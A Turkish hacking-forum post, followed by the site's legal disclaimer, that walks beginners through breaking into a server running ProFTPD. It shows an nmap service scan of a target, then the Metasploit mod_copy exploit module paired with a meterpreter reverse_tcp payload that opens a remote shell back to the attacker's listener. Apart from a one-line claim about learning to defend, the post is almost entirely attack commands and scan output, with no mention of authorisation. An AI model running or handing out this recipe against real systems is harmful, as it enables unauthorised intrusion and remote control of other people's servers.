Serverda ProFTPD Açığını Kullanarak Sızmak

Arch or Not

Yeni üye
18 May 2021
44
10
Herkese Merhaba,
Hocalarım, kardeşlerim,akranlarım bu benim ilk rehberim olabilecek/doğabilecek hatalar için özür dilerim.


Sızma (Pentesting)
Nasıl yapıldığını bilmeden kendimizi koruyamayız, bunun için ilk exploit kullanımını göstermek istedim. İlk olarak Linux sistemimizden terminali açıyoruz ve Nmap ile port/service taraması yapıyoruz:
Bash:
sudo nmap -sS -sV targetip
Çıktı:
Bash:
PORT     STATE    SERVICE       VERSION
21/tcp   open     ftp           ProFTPD
22/tcp   filtered ssh
25/tcp   filtered smtp
80/tcp   open     http          Apache httpd (PleskLin)
110/tcp  filtered pop3
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
161/tcp  filtered snmp
389/tcp  filtered ldap
427/tcp  filtered svrloc
443/tcp  open     ssl/http      Apache httpd (PleskLin)
445/tcp  filtered microsoft-ds
465/tcp  filtered smtps
587/tcp  filtered submission
873/tcp  filtered rsync
3306/tcp filtered mysql
8009/tcp filtered ajp13
8443/tcp open     ssl/https-alt sw-cp-server
Hedefin 21. Portunda ProFTPD çalıştığından emin olduktan sonra "msfconsole" yazarak metasploit'i açıyoruz, ve
Bash:
use exploit/unix/ftp/proftpd_modcopy_exec
Yazarak exploitimizi seçiyoruz sıra payloadımızda:
Bash:
use payload/linux/x64/meterpreter/reverse_tcp
Diyerek payloadımızı da seçiyoruz LHOST, LPORT ayarlamalarını yaptıktan sonra "exploit" diyerek çalıştırabiliriz.

 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.